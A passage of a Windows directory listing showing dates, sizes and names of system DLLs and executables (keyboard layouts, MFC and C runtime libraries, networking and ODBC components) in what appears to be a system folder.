09/15/2018  12:10 AM             7,680 KBDTIPRD.DLL
09/15/2018  12:10 AM             7,168 KBDTT102.DLL
09/15/2018  12:10 AM             7,680 KBDTUF.DLL
09/15/2018  12:10 AM             7,680 KBDTUQ.DLL
09/15/2018  12:10 AM             7,168 KBDTURME.DLL
09/15/2018  12:10 AM             7,680 KBDTZM.DLL
09/15/2018  12:10 AM             7,168 KBDUGHR.DLL
09/15/2018  12:10 AM             7,168 KBDUGHR1.DLL
09/15/2018  12:10 AM             6,656 KBDUK.DLL
09/15/2018  12:10 AM             8,192 KBDUKX.DLL
09/15/2018  12:10 AM             6,656 KBDUR.DLL
09/15/2018  12:10 AM             7,168 KBDUR1.DLL
09/15/2018  12:10 AM             6,656 KBDURDU.DLL
09/15/2018  12:10 AM             8,192 KBDUS.DLL
09/15/2018  12:10 AM             7,168 KBDUSA.DLL
09/15/2018  12:10 AM             7,168 KBDUSL.DLL
09/15/2018  12:10 AM             7,168 KBDUSR.DLL
09/15/2018  12:10 AM             7,680 KBDUSX.DLL
09/15/2018  12:10 AM             7,168 KBDUZB.DLL
09/15/2018  12:10 AM             6,656 KBDVNTC.DLL
09/15/2018  12:10 AM             7,168 KBDWOL.DLL
09/15/2018  12:10 AM             7,168 KBDYAK.DLL
09/15/2018  12:10 AM             7,168 KBDYBA.DLL
09/15/2018  12:10 AM             7,168 KBDYCC.DLL
09/15/2018  12:10 AM             8,704 KBDYCL.DLL
09/15/2018  12:09 AM           125,528 KerbClientShared.dll
09/15/2018  12:09 AM           773,120 kerberos.dll
09/15/2018  12:09 AM            51,336 kernel.appcore.dll
09/15/2018  12:09 AM           649,264 kernel32.dll
09/15/2018  12:09 AM         2,072,176 KernelBase.dll
09/15/2018  12:10 AM            39,936 KeyCredMgr.dll
09/15/2018  12:09 AM            66,048 keyiso.dll
09/15/2018  12:09 AM            31,744 klist.exe
09/15/2018  12:09 AM            39,424 kmddsp.tsp
09/15/2018  12:12 AM    <DIR>          ko-KR
09/15/2018  12:09 AM            31,744 ksetup.exe
09/15/2018  12:09 AM            15,360 ktmutil.exe
09/15/2018  12:09 AM            21,504 ktmw32.dll
09/15/2018  12:09 AM            57,344 ktpass.exe
09/15/2018  12:10 AM            52,736 l2nacp.dll
09/15/2018  12:09 AM            15,360 label.exe
09/15/2018  12:09 AM           182,784 LaunchTM.exe
09/15/2018  12:09 AM           211,938 lcphrase.tbl
09/15/2018  12:09 AM            24,114 lcptr.tbl
01/19/2020  11:39 PM            61,532 license.rtf
09/15/2018  12:12 AM    <DIR>          Licenses
09/15/2018  12:09 AM           334,848 LicensingDiagSpp.dll
09/15/2018  12:10 AM            23,552 linkinfo.dll
09/15/2018  12:09 AM           100,864 loadperf.dll
09/15/2018  12:09 AM           806,560 locale.nls
09/15/2018  12:09 AM            43,520 lodctr.exe
09/15/2018  12:12 AM    <DIR>          LogFiles
09/15/2018  12:09 AM            97,280 logman.exe
09/15/2018  12:09 AM            19,968 logoff.exe
09/15/2018  12:09 AM           186,120 logoncli.dll
09/15/2018  12:09 AM             2,560 lpk.dll
09/15/2018  12:09 AM            23,552 lsmproxy.dll
09/15/2018  12:12 AM    <DIR>          lt-LT
09/15/2018  12:10 AM            49,168 luainstall.dll
09/15/2018  12:12 AM    <DIR>          lv-LV
09/15/2018  12:09 AM             2,560 lz32.dll
09/15/2018  12:09 AM             9,926 l_intl.nls
09/15/2018  12:09 AM            68,608 makecab.exe
09/15/2018  12:09 AM            80,896 mcbuilder.exe
09/15/2018  12:09 AM            43,008 mf3216.dll
02/10/2016  10:25 PM         4,424,352 mfc120.dll
02/10/2016  10:25 PM            46,248 mfc120chs.dll
02/10/2016  10:25 PM            46,248 mfc120cht.dll
02/10/2016  10:25 PM            74,920 mfc120deu.dll
02/10/2016  10:25 PM            65,192 mfc120enu.dll
02/10/2016  10:25 PM            73,896 mfc120esn.dll
02/10/2016  10:25 PM            74,920 mfc120fra.dll
02/10/2016  10:25 PM            72,872 mfc120ita.dll
02/10/2016  10:25 PM            53,928 mfc120jpn.dll
02/10/2016  10:25 PM            53,416 mfc120kor.dll
02/10/2016  10:25 PM            70,824 mfc120rus.dll
02/10/2016  10:25 PM         4,449,952 mfc120u.dll
10/10/2017  09:01 PM         4,821,632 mfc140.dll
10/10/2017  09:01 PM            46,736 mfc140chs.dll
10/10/2017  09:01 PM            46,736 mfc140cht.dll
10/10/2017  09:01 PM            75,400 mfc140deu.dll
10/10/2017  09:01 PM            65,680 mfc140enu.dll
10/10/2017  09:01 PM            74,384 mfc140esn.dll
10/10/2017  09:01 PM            75,408 mfc140fra.dll
10/10/2017  09:01 PM            73,360 mfc140ita.dll
10/10/2017  09:01 PM            54,928 mfc140jpn.dll
10/10/2017  09:01 PM            53,904 mfc140kor.dll
10/10/2017  09:01 PM            71,312 mfc140rus.dll
10/10/2017  09:01 PM         5,124,744 mfc140u.dll
09/15/2018  12:09 AM         1,178,624 mfc42.dll
09/15/2018  12:09 AM         1,163,776 mfc42u.dll
02/10/2016  10:25 PM            83,104 mfcm120.dll
02/10/2016  10:25 PM            83,104 mfcm120u.dll
10/10/2017  09:01 PM            92,296 mfcm140.dll
10/10/2017  09:01 PM            92,808 mfcm140u.dll
09/15/2018  12:10 AM            28,672 mfcsubs.dll
09/15/2018  12:09 AM            18,944 mgmtapi.dll
09/15/2018  12:10 AM           102,912 mi.dll
09/15/2018  12:10 AM            73,216 mibincodec.dll
09/15/2018  12:10 AM            14,336 Microsoft.Management.Infrastructure.Native.Unmanaged.dll
09/15/2018  12:09 AM           119,808 migisol.dll
09/15/2018  02:06 AM    <DIR>          migration
09/15/2018  12:12 AM    <DIR>          migwiz
09/15/2018  12:09 AM            33,792 mimefilt.dll
09/15/2018  12:10 AM           119,296 mimofcodec.dll
09/15/2018  12:09 AM            12,288 MinstoreEvents.dll
09/15/2018  12:09 AM           232,448 mintdh.dll
09/15/2018  12:09 AM         2,883,584 mispace.dll
09/15/2018  12:10 AM           192,000 miutils.dll
09/15/2018  12:09 AM           673,088 mlang.dat
09/15/2018  12:09 AM           198,656 mlang.dll
09/15/2018  12:09 AM           366,736 MMDevAPI.dll
09/15/2018  12:09 AM            26,624 mode.com
09/15/2018  12:09 AM            24,576 more.com
09/15/2018  12:09 AM            15,360 mountvol.exe
09/15/2018  12:09 AM            89,552 mpr.dll
09/15/2018  12:09 AM           445,952 mprapi.dll
09/15/2018  12:09 AM           404,480 mprdim.dll
09/15/2018  12:09 AM            12,288 mprext.dll
09/15/2018  12:09 AM           113,152 mprmsg.dll
09/15/2018  12:09 AM            14,336 MRINFO.EXE
09/15/2018  12:09 AM           864,624 MrmCoreR.dll
09/15/2018  12:09 AM             2,560 msafd.dll
09/15/2018  12:09 AM            50,608 msasn1.dll
09/15/2018  12:09 AM           155,136 msaudite.dll
09/15/2018  12:09 AM           235,520 mscandui.dll
09/15/2018  12:09 AM            11,776 mscat32.dll
09/15/2018  12:11 AM           207,872 msclmd.dll
09/15/2018  12:09 AM           606,208 mscms.dll
09/15/2018  12:09 AM           315,904 mscoree.dll
09/15/2018  12:09 AM            19,968 mscorier.dll
09/15/2018  12:09 AM            81,544 mscories.dll
09/15/2018  12:09 AM             2,560 mscpx32r.dLL
09/15/2018  12:09 AM            14,848 mscpxl32.dLL
09/15/2018  12:09 AM         1,296,552 msctf.dll
09/15/2018  12:09 AM             8,704 msctfime.ime
09/15/2018  12:09 AM            70,144 MsCtfMonitor.dll
09/15/2018  12:09 AM            91,136 msctfp.dll
09/15/2018  12:09 AM            87,040 msctfui.dll
09/15/2018  12:09 AM         1,804,288 msctfuimanager.dll
09/15/2018  12:09 AM           121,856 msdart.dll
09/15/2018  12:09 AM             5,120 msdatsrc.tlb
09/15/2018  12:09 AM           401,720 msdelta.dll
09/15/2018  12:12 AM    <DIR>          MSDRM
09/15/2018  12:10 AM           439,296 msdrm.dll
09/15/2018  12:12 AM    <DIR>          Msdtc
09/15/2018  12:09 AM           726,016 msdtcprx.dll
09/15/2018  12:09 AM            12,288 msdtcspoffln.dll
09/15/2018  12:09 AM           265,216 msdtcuiu.dll
09/15/2018  12:09 AM            22,528 msdtcVSp1res.dll
09/15/2018  12:09 AM         2,770,944 msftedit.dll
09/15/2018  12:09 AM            22,528 msg.exe
09/15/2018  12:10 AM         3,918,848 msi.dll
09/15/2018  12:10 AM            78,336 msiexec.exe
09/15/2018  12:10 AM           323,584 msihnd.dll
09/15/2018  12:10 AM            17,408 msiltcfg.dll
09/15/2018  12:09 AM             6,656 msimg32.dll
09/15/2018  12:10 AM            26,112 msimsg.dll
09/15/2018  12:09 AM            38,400 msimtf.dll
09/15/2018  12:09 AM           335,360 msinfo32.exe
09/15/2018  12:10 AM            24,064 msisip.dll
09/15/2018  12:09 AM           260,096 msIso.dll
09/15/2018  12:09 AM         1,311,744 msjet40.dll
09/15/2018  12:09 AM             8,704 msjint40.dll
09/15/2018  12:09 AM            83,968 msjter40.dll
09/15/2018  12:09 AM           290,816 msjtes40.dll
09/15/2018  12:09 AM            49,152 mskeyprotect.dll
09/15/2018  12:09 AM           184,320 msls31.dll
09/15/2018  12:09 AM            63,488 msobjs.dll
08/22/2017  07:38 PM            96,440 msodbcdiag13.dll
08/22/2017  07:38 PM         1,962,168 msodbcsql13.dll
09/15/2018  12:09 AM             2,560 msorc32r.dll
09/15/2018  12:09 AM           160,256 msorcl32.dll
09/15/2018  12:09 AM            44,560 mspatcha.dll
09/15/2018  12:09 AM            64,000 mspatchc.dll
09/15/2018  12:09 AM           101,376 msscript.ocx
09/15/2018  12:09 AM            59,904 mssign32.dll
09/15/2018  12:10 AM           221,696 mstask.dll
09/15/2018  12:09 AM           413,696 msutb.dll
09/15/2018  12:09 AM           387,600 msv1_0.dll
09/15/2018  12:09 AM            64,512 msvcirt.dll
02/20/2011  12:03 AM           421,200 msvcp100.dll
09/15/2018  12:09 AM           414,968 msvcp110_win.dll
02/10/2016  10:25 PM           455,488 msvcp120.dll
09/15/2018  12:10 AM           485,576 msvcp120_clr0400.dll
10/10/2017  09:01 PM           457,000 msvcp140.dll
09/15/2018  12:09 AM           446,976 msvcp60.dll
09/15/2018  12:09 AM           516,496 msvcp_win.dll
02/19/2011  01:40 AM           773,968 msvcr100.dll
09/15/2018  12:10 AM            19,080 msvcr100_clr0400.dll
02/10/2016  10:25 PM           971,584 msvcr120.dll
09/15/2018  12:10 AM           987,840 msvcr120_clr0400.dll
09/15/2018  12:09 AM           779,376 msvcrt.dll
09/15/2018  12:09 AM            60,928 msvcrt40.dll
09/15/2018  12:09 AM           866,816 mswdat10.dll
09/15/2018  12:09 AM           324,616 mswsock.dll
09/15/2018  12:09 AM           640,512 mswstr10.dll
10/29/2018  03:37 PM         1,495,552 msxml3.dll
09/15/2018  12:09 AM             2,560 msxml3r.dll
10/29/2018  03:37 PM         2,020,560 msxml6.dll
09/15/2018  12:10 AM             2,560 msxml6r.dll
09/15/2018  12:09 AM           202,768 MTF.dll
09/15/2018  12:09 AM           369,152 mtxclu.dll
09/15/2018  12:10 AM            26,624 mtxdm.dll
09/15/2018  12:10 AM             8,192 mtxex.dll
09/15/2018  12:10 AM            31,232 mtxlegih.dll
09/15/2018  12:09 AM           116,224 mtxoci.dll
09/15/2018  12:12 AM    <DIR>          MUI
09/15/2018  12:09 AM            14,848 muifontsetup.dll
09/15/2018  12:10 AM            83,968 MuiUnattend.exe
09/15/2018  12:09 AM            54,784 NapiNSP.dll
09/15/2018  12:12 AM    <DIR>          nb-NO
09/15/2018  12:09 AM            19,968 NcaApi.dll
09/15/2018  12:10 AM            33,280 nci.dll
09/15/2018  12:10 AM            55,808 ncobjapi.dll
09/15/2018  12:09 AM           127,592 ncrypt.dll
09/15/2018  12:09 AM           281,600 ncryptprov.dll
09/15/2018  12:09 AM           115,880 ncryptsslp.dll
09/15/2018  12:10 AM            65,536 ndadmin.exe
09/15/2018  12:12 AM    <DIR>          NDF
09/15/2018  12:09 AM           245,248 ndfapi.dll
09/15/2018  12:09 AM            34,816 ndfetw.dll
09/15/2018  12:09 AM               565 NdfEventView.xml
09/15/2018  12:09 AM            81,920 ndfhcdiscovery.dll
09/15/2018  12:09 AM            77,312 ndishc.dll
09/15/2018  12:09 AM            21,504 ndproxystub.dll
09/15/2018  12:09 AM           100,864 negoexts.dll
09/15/2018  12:09 AM            47,104 net.exe
09/15/2018  12:09 AM           140,800 net1.exe
09/15/2018  12:09 AM            68,680 netapi32.dll
09/15/2018  12:09 AM            15,360 netbios.dll
09/15/2018  12:09 AM            22,016 netbtugc.exe
09/15/2018  12:10 AM            58,880 NetCfgNotifyObjectHost.exe
09/15/2018  12:09 AM            76,600 netcfgx.dll
09/15/2018  12:09 AM           236,544 netdiagfx.dll
09/15/2018  12:09 AM            73,216 netdom.exe
09/15/2018  12:09 AM            81,408 NetDriverInstall.dll
09/15/2018  12:09 AM            20,480 netevent.dll
09/15/2018  12:09 AM            90,624 netfxperf.dll
09/15/2018  12:09 AM             2,560 neth.dll
09/15/2018  12:09 AM           155,648 netiohlp.dll
09/15/2018  12:09 AM            25,088 netiougc.exe
09/15/2018  12:09 AM           140,288 netjoin.dll
09/15/2018  12:09 AM           659,968 netlogon.dll
09/15/2018  12:09 AM             2,560 netmsg.dll
09/15/2018  12:10 AM           178,176 netprofm.dll
09/15/2018  12:09 AM            52,736 netprovfw.dll
09/15/2018  12:09 AM            56,832 netprovisionsp.dll
09/15/2018  12:09 AM           108,048 NetSetupApi.dll
09/15/2018  12:09 AM           595,256 NetSetupEngine.dll
09/15/2018  12:10 AM           370,688 NetSetupShim.dll
09/15/2018  12:09 AM            82,432 netsh.exe
09/15/2018  12:09 AM            32,768 NETSTAT.EXE
09/15/2018  12:09 AM            37,160 netutils.dll
09/15/2018  12:09 AM         1,182,208 networkexplorer.dll
09/15/2018  12:09 AM            43,008 networkitemfactory.dll
09/15/2018  12:12 AM    <DIR>          networklist
09/15/2018  12:10 AM           486,912 newdev.dll
09/15/2018  12:10 AM            67,584 newdev.exe
09/15/2018  12:10 AM            53,760 ngclocal.dll
09/15/2018  12:09 AM           322,560 ninput.dll
09/15/2018  12:12 AM    <DIR>          nl-NL
09/15/2018  12:09 AM            70,144 nlaapi.dll
09/15/2018  12:09 AM           152,576 nlhtml.dll
09/15/2018  12:10 AM            18,432 nlmproxy.dll
09/15/2018  12:10 AM            14,336 nlmsprep.dll
09/15/2018  12:10 AM            89,600 nlsbres.dll
09/14/2018  10:34 AM         5,489,664 NlsData0009.dll
09/15/2018  12:10 AM             8,704 Nlsdl.dll
09/15/2018  12:09 AM           423,936 nltest.exe
09/15/2018  12:10 AM             5,120 normaliz.dll
09/15/2018  12:09 AM           240,128 notepad.exe
09/15/2018  12:10 AM            21,504 npmproxy.dll
09/15/2018  12:09 AM            35,840 nshhttp.dll
09/15/2018  12:09 AM           332,800 nshipsec.dll
09/15/2018  12:09 AM           607,744 nshwfp.dll
09/15/2018  12:09 AM            20,144 nsi.dll
09/15/2018  12:09 AM            77,824 nslookup.exe
09/15/2018  12:09 AM           177,312 ntasn1.dll
09/15/2018  12:09 AM         1,674,480 ntdll.dll
09/15/2018  12:09 AM            97,792 ntdsapi.dll
09/15/2018  12:09 AM            57,344 ntlanman.dll
09/15/2018  12:09 AM            33,056 NtlmShared.dll
09/15/2018  12:09 AM           153,408 ntmarta.dll
09/15/2018  12:09 AM           317,440 ntprint.dll
09/15/2018  12:09 AM            61,952 ntprint.exe
09/15/2018  12:10 AM           671,232 ntshrui.dll
09/15/2018  12:09 AM            16,384 ntvdm64.dll
09/15/2018  12:09 AM           556,544 objsel.dll
09/15/2018  12:09 AM           165,888 ocsetapi.dll
09/15/2018  12:09 AM           605,184 odbc32.dll
09/15/2018  12:09 AM            72,192 odbcad32.exe
09/15/2018  12:09 AM            39,936 odbcbcp.dll
09/15/2018  12:09 AM            24,064 odbcconf.dll
09/15/2018  12:09 AM            22,016 odbcconf.exe
09/15/2018  12:09 AM             4,453 odbcconf.rsp
09/15/2018  12:09 AM           110,592 odbccp32.dll
09/15/2018  12:09 AM            69,632 odbccr32.dll
09/15/2018  12:09 AM            70,656 odbccu32.dll
09/15/2018  12:09 AM           225,280 odbcint.dll
09/15/2018  12:09 AM            10,240 odbcji32.dll
09/15/2018  12:09 AM           318,464 odbcjt32.dll
09/15/2018  12:09 AM           128,000 odbctrac.dll
09/15/2018  12:09 AM             8,704 oddbse32.dll
09/15/2018  12:09 AM             8,704 odexl32.dll
09/15/2018  12:09 AM             8,704 odfox32.dll
09/15/2018  12:09 AM             8,704 odpdx32.dll
09/15/2018  12:09 AM             8,704 odtext32.dll
09/15/2018  12:09 AM           220,672 offfilt.dll
09/15/2018  12:09 AM           116,024 offlinelsa.dll
09/15/2018  12:09 AM           222,008 offlinesam.dll
09/15/2018  12:10 AM         1,026,440 ole32.dll
09/15/2018  12:09 AM           324,608 oleacc.dll
09/15/2018  12:09 AM            10,240 oleacchooks.dll
09/15/2018  12:09 AM             4,608 oleaccrc.dll
09/15/2018  12:09 AM           628,248 oleaut32.dll
09/15/2018  12:09 AM            88,064 olepro32.dll
09/15/2018  12:09 AM            52,224 OnDemandConnRouteHelper.dll
09/15/2018  12:10 AM           210,944 OneCoreCommonProxyStub.dll
09/15/2018  12:09 AM         3,652,664 OneCoreUAPCommonProxyStub.dll
09/15/2018  12:12 AM    <DIR>          oobe
09/15/2018  12:09 AM         1,607,168 OpcServices.dll
09/15/2018  12:11 AM            23,552 opencl.dll
09/15/2018  12:09 AM            60,416 openfiles.exe
09/15/2018  12:10 AM           100,872 OpenWith.exe
09/15/2018  12:10 AM            21,504 osbaseln.dll
09/15/2018  12:09 AM             8,192 osuninst.dll
09/15/2018  12:09 AM            16,896 PATHPING.EXE
09/15/2018  12:10 AM            53,760 pautoenr.dll
09/15/2018  12:10 AM           707,072 PayloadRestrictions.dll
09/15/2018  12:09 AM           659,008 PCPKsp.dll
09/15/2018  12:09 AM            26,032 pcwum.dll
09/15/2018  12:09 AM           260,608 pdh.dll
09/15/2018  12:10 AM           345,600 PeerDistSh.dll
08/22/2017  11:17 PM            51,896 perf-MSSQL14.MSSQLSERVER-sqlagtctr.dll
08/22/2017  11:16 PM           111,288 perf-MSSQLSERVER-sqlctr14.0.1000.169.dll
09/15/2018  12:09 AM            41,472 perfctrs.dll
09/15/2018  12:09 AM            37,376 perfdisk.dll
09/15/2018  12:09 AM            21,504 perfhost.exe
09/15/2018  12:09 AM            22,016 perfnet.dll
09/15/2018  12:09 AM            35,328 perfos.dll
09/15/2018  12:09 AM            36,352 perfproc.dll
09/15/2018  12:09 AM           888,336 pidgenx.dll
09/15/2018  12:09 AM            18,944 PING.EXE
09/15/2018  12:09 AM           204,288 PkgMgr.exe
09/15/2018  12:09 AM           196,096 pku2u.dll
09/15/2018  12:12 AM    <DIR>          pl-PL
09/15/2018  12:10 AM         1,534,464 pla.dll
09/15/2018  12:09 AM           296,960 polstore.dll
09/14/2018  11:09 PM           117,248 poqexec.exe
09/15/2018  12:09 AM            80,896 powercfg.exe
09/15/2018  12:09 AM           341,560 powrprof.dll
09/15/2018  12:10 AM           248,832 PresentationHost.exe
09/15/2018  12:10 AM            48,640 PresentationHostProxy.dll
09/15/2018  12:09 AM            13,824 prflbmsg.dll
09/15/2018  12:09 AM            14,848 print.exe
09/15/2018  12:09 AM           106,384 profapi.dll
09/15/2018  12:10 AM           133,632 profext.dll
09/15/2018  12:09 AM         1,571,880 propsys.dll
09/15/2018  12:09 AM           238,592 provthrd.dll
09/15/2018  12:10 AM            63,488 prvdmofcomp.dll
09/15/2018  12:09 AM            17,208 psapi.dll
09/15/2018  12:09 AM            60,432 PSHED.DLL
09/15/2018  12:10 AM            38,912 PSModuleDiscoveryProvider.dll
09/15/2018  12:09 AM            14,336 pstorec.dll
09/15/2018  12:12 AM    <DIR>          pt-BR
09/15/2018  12:12 AM    <DIR>          pt-PT
09/15/2018  12:10 AM            70,656 pwrshplugin.dll
09/15/2018  12:09 AM            20,992 qappsrv.exe
09/15/2018  12:09 AM            23,552 qprocess.exe
09/15/2018  12:09 AM            80,896 Query.dll
09/15/2018  12:09 AM            14,336 query.exe
09/15/2018  12:09 AM            20,992 quser.exe
09/15/2018  12:09 AM            25,088 qwinsta.exe
09/15/2018  12:10 AM            91,648 radardt.dll
09/15/2018  12:12 AM    <DIR>          ras
09/15/2018  12:09 AM             1,820 rasctrnm.h
09/15/2018  12:09 AM            64,000 rasdiag.dll
09/15/2018  12:09 AM           156,672 rasman.dll
09/15/2018  12:10 AM           284,160 rasppp.dll
09/15/2018  12:09 AM           241,664 rastapi.dll
09/15/2018  12:09 AM           316,928 rdpinit.exe
09/15/2018  12:09 AM            38,400 RdpSa.exe
09/15/2018  12:09 AM            24,064 RdpSaProxy.exe
09/15/2018  12:09 AM            11,776 RdpSaPs.dll
09/15/2018  12:09 AM            26,112 RdpSaUacHelper.exe
09/15/2018  12:09 AM           387,584 rdpshell.exe
09/15/2018  12:09 AM            74,240 rdpsign.exe
09/15/2018  12:09 AM            41,984 rdrleakdiag.exe
09/15/2018  12:09 AM           186,368 rdvgocl32.dll
09/15/2018  12:09 AM           684,544 rdvgogl32.dll
09/15/2018  12:09 AM           146,432 rdvgu1132.dll
09/15/2018  12:09 AM            96,256 rdvgumd32.dll
09/15/2018  12:09 AM            65,536 rdvvmtransport.dll
09/15/2018  12:10 AM           916,792 ReAgent.dll
09/15/2018  12:10 AM            35,328 ReAgentc.exe
09/15/2018  12:09 AM            12,288 recover.exe
09/15/2018  12:12 AM    <DIR>          Recovery
09/15/2018  12:09 AM            59,392 reg.exe
09/15/2018  12:09 AM            82,944 regapi.dll
09/15/2018  12:10 AM           329,216 regedit.exe
09/15/2018  12:10 AM            10,240 regedt32.exe
09/15/2018  12:10 AM            20,480 Register-CimProvider.exe
09/15/2018  12:09 AM            20,992 regsvr32.exe
09/15/2018  12:10 AM           152,064 ReInfo.dll
09/15/2018  12:09 AM            45,568 relog.exe
09/15/2018  12:09 AM            18,944 replace.exe
09/15/2018  12:09 AM            14,848 reset.exe
09/15/2018  12:09 AM               714 RestartManager.mof
09/15/2018  12:09 AM               176 RestartManagerUninstall.mof
09/15/2018  12:09 AM           481,792 resutils.dll
09/15/2018  12:09 AM            32,768 rfxvmt.dll
09/15/2018  12:09 AM           496,640 riched20.dll
09/15/2018  12:09 AM             8,192 riched32.dll
09/15/2018  12:10 AM           540,672 RMActivate.exe
09/15/2018  12:10 AM           557,568 RMActivate_isv.exe
09/15/2018  12:10 AM           479,232 RMActivate_ssp.exe
09/15/2018  12:10 AM           479,744 RMActivate_ssp_isv.exe
09/15/2018  12:09 AM            15,360 RmClient.exe
09/15/2018  12:12 AM    <DIR>          ro-RO
09/15/2018  12:09 AM           103,936 Robocopy.exe
09/15/2018  12:09 AM            19,456 ROUTE.EXE
09/15/2018  12:09 AM           151,552 rpchttp.dll
09/15/2018  12:09 AM             8,704 RpcNs4.dll
09/15/2018  12:09 AM            27,648 rpcnsh.dll
09/15/2018  12:09 AM           782,968 rpcrt4.dll
09/15/2018  12:09 AM            51,640 RpcRtRemote.dll
09/15/2018  12:09 AM           185,608 rsaenh.dll
09/15/2018  12:09 AM            43,566 rsop.msc
09/15/2018  12:10 AM            80,896 rsopprov.exe
09/15/2018  12:09 AM           198,656 RstrtMgr.dll
09/15/2018  12:09 AM            36,864 rtffilt.dll
09/15/2018  12:09 AM           162,304 rtm.dll
09/15/2018  12:09 AM            52,224 rtutils.dll
09/15/2018  12:09 AM           155,664 RTWorkQ.dll
09/15/2018  12:12 AM    <DIR>          ru-RU
09/15/2018  12:09 AM            17,920 runas.exe
09/15/2018  12:09 AM            61,952 rundll32.exe
09/15/2018  12:09 AM            47,104 runonce.exe
09/15/2018  12:09 AM            19,456 rwinsta.exe
09/15/2018  12:09 AM            70,144 samcli.dll
09/15/2018  12:09 AM            84,480 samlib.dll
09/15/2018  12:09 AM            60,928 sc.exe
09/15/2018  12:10 AM            67,072 SCardDlg.dll
09/15/2018  12:09 AM           214,016 scecli.dll
09/15/2018  12:10 AM           384,000 scesrv.dll
09/15/2018  12:09 AM           447,488 schannel.dll
09/15/2018  12:09 AM            19,968 schedcli.dll
09/15/2018  12:09 AM           190,976 schtasks.exe
09/15/2018  12:10 AM           236,032 scksp.dll
09/15/2018  12:09 AM            42,148 SCregEdit.wsf
09/15/2018  12:09 AM            28,672 scrnsave.scr
09/15/2018  12:09 AM           207,872 scrobj.dll
09/15/2018  12:09 AM           466,432 scrptadm.dll
09/15/2018  12:09 AM           165,376 scrrun.dll
09/15/2018  12:09 AM            20,992 sdbinst.exe
09/15/2018  12:09 AM           220,672 SDClient.dll
09/15/2018  12:09 AM            37,888 SecEdit.exe
09/15/2018  12:09 AM           492,432 sechost.dll
09/15/2018  12:10 AM           347,648 secproc.dll
09/15/2018  12:10 AM           346,112 secproc_isv.dll
09/15/2018  12:10 AM            88,064 secproc_ssp.dll
09/15/2018  12:10 AM            88,576 secproc_ssp_isv.dll
09/15/2018  12:09 AM            23,040 secur32.dll
09/15/2018  12:09 AM             4,608 security.dll
09/15/2018  12:09 AM            11,264 SensApi.dll
09/15/2018  12:09 AM           409,088 SessEnv.dll
09/15/2018  12:09 AM            24,064 setspn.exe
09/15/2018  02:06 AM    <DIR>          setup
09/15/2018  12:09 AM            26,112 setup16.exe
09/15/2018  12:10 AM         4,526,280 setupapi.dll
09/15/2018  12:09 AM           117,760 setupugc.exe
09/15/2018  12:09 AM            46,592 setx.exe
09/15/2018  12:10 AM             2,560 sfc.dll
09/15/2018  12:09 AM            35,840 sfc.exe
09/15/2018  12:10 AM            41,984 sfc_os.dll
09/15/2018  12:09 AM           111,616 shacct.dll
09/15/2018  12:09 AM            58,368 shacctprofile.dll
09/15/2018  12:09 AM           555,440 SHCore.dll
10/29/2018  03:37 PM         5,584,056 shell32.dll
09/15/2018  12:09 AM             8,704 shfolder.dll
09/15/2018  12:09 AM             5,632 shimeng.dll
09/15/2018  12:09 AM           274,224 shlwapi.dll
09/15/2018  12:09 AM           108,032 shsetup.dll
09/15/2018  12:09 AM            23,552 shutdown.exe
09/15/2018  12:09 AM            42,496 signdrv.dll
09/15/2018  12:09 AM             8,192 simpdata.tlb
09/15/2018  12:12 AM    <DIR>          sk-SK
09/15/2018  12:12 AM    <DIR>          sl-SI
09/15/2018  12:10 AM           122,368 slc.dll
09/15/2018  12:09 AM            19,968 slcext.dll
09/15/2018  02:06 AM    <DIR>          slmgr
09/15/2018  12:09 AM           142,904 slmgr.vbs
09/15/2018  12:09 AM            72,704 slwga.dll
09/15/2018  12:09 AM           641,024 SmartcardCredentialProvider.dll
09/15/2018  12:12 AM    <DIR>          SMI
09/15/2018  12:09 AM            20,992 smphost.dll
09/15/2018  12:09 AM            25,600 snmpapi.dll
09/15/2018  12:09 AM           130,560 softkbd.dll
09/15/2018  12:09 AM            24,576 sort.exe
09/15/2018  12:10 AM           164,864 spacebridge.dll
09/15/2018  12:09 AM            82,944 spbcd.dll
09/15/2018  02:06 AM    <DIR>          Speech_OneCore
09/15/2018  12:09 AM            87,040 spfileq.dll
09/15/2018  12:09 AM            83,968 spinf.dll
09/15/2018  12:09 AM             9,216 spnet.dll
09/15/2018  12:09 AM           129,024 spopk.dll
09/15/2018  12:12 AM    <DIR>          spp
09/15/2018  12:10 AM           102,912 sppc.dll
09/15/2018  12:09 AM           483,328 sppcext.dll
09/15/2018  12:10 AM            36,368 sppinst.dll
09/15/2018  12:12 AM    <DIR>          sppui
09/15/2018  12:10 AM           114,688 sppwmi.dll
09/15/2018  12:09 AM           407,552 spwizeng.dll
09/15/2018  12:09 AM         5,865,272 spwizimg.dll
09/15/2018  12:09 AM         5,928,448 spwizimg_svr.dll
09/15/2018  12:09 AM            16,696 spwizres.dll
09/15/2018  12:10 AM           114,688 sqlcecompact40.dll
09/15/2018  12:10 AM           169,472 sqlceoledb40.dll
09/15/2018  12:10 AM           705,536 sqlceqp40.dll
09/15/2018  12:10 AM           414,208 sqlcese40.dll
06/24/2016  05:29 AM         3,006,656 sqlncli11.dll
08/22/2017  07:39 PM            26,289 SQLServerManager14.msc
09/15/2018  12:09 AM           666,112 sqlsrv32.dll
09/15/2018  12:09 AM            94,208 sqlsrv32.rll
09/15/2018  12:09 AM           188,768 sqlunirl.dll
09/15/2018  12:09 AM            17,760 sqlwid.dll
09/15/2018  12:09 AM            43,872 sqlwoa.dll
09/15/2018  12:09 AM            40,432 sqmapi.dll
09/15/2018  12:12 AM    <DIR>          sr-Latn-RS
09/15/2018  12:09 AM           304,128 SrpUxNativeSnapIn.dll
09/15/2018  12:09 AM            74,352 srvcli.dll
09/15/2018  12:09 AM            36,352 sscore.dll
09/15/2018  12:09 AM           122,400 sspicli.dll
09/15/2018  12:09 AM           111,416 SSShim.dll
09/15/2018  12:10 AM            53,760 stclient.dll
09/15/2018  12:09 AM            18,432 stdole2.tlb
09/15/2018  12:09 AM             7,168 stdole32.tlb
09/15/2018  12:09 AM         2,013,696 storagewmi.dll
09/15/2018  12:09 AM            20,480 storagewmi_passthru.dll
09/15/2018  12:09 AM            14,848 subst.exe
09/15/2018  12:12 AM    <DIR>          sv-SE
09/15/2018  12:09 AM            45,448 svchost.exe
09/15/2018  12:10 AM           543,352 sxs.dll
09/15/2018  12:09 AM            19,456 sxshared.dll
09/15/2018  12:09 AM            23,552 sxsstore.dll
09/15/2018  12:10 AM            29,696 sxstrace.exe
09/15/2018  12:09 AM            15,360 syssetup.dll
09/15/2018  12:09 AM            76,800 systeminfo.exe
09/15/2018  12:09 AM            52,224 takeown.exe
09/15/2018  12:09 AM           361,984 taskcomp.dll
09/15/2018  12:09 AM            74,240 taskkill.exe
09/15/2018  12:09 AM            79,360 tasklist.exe
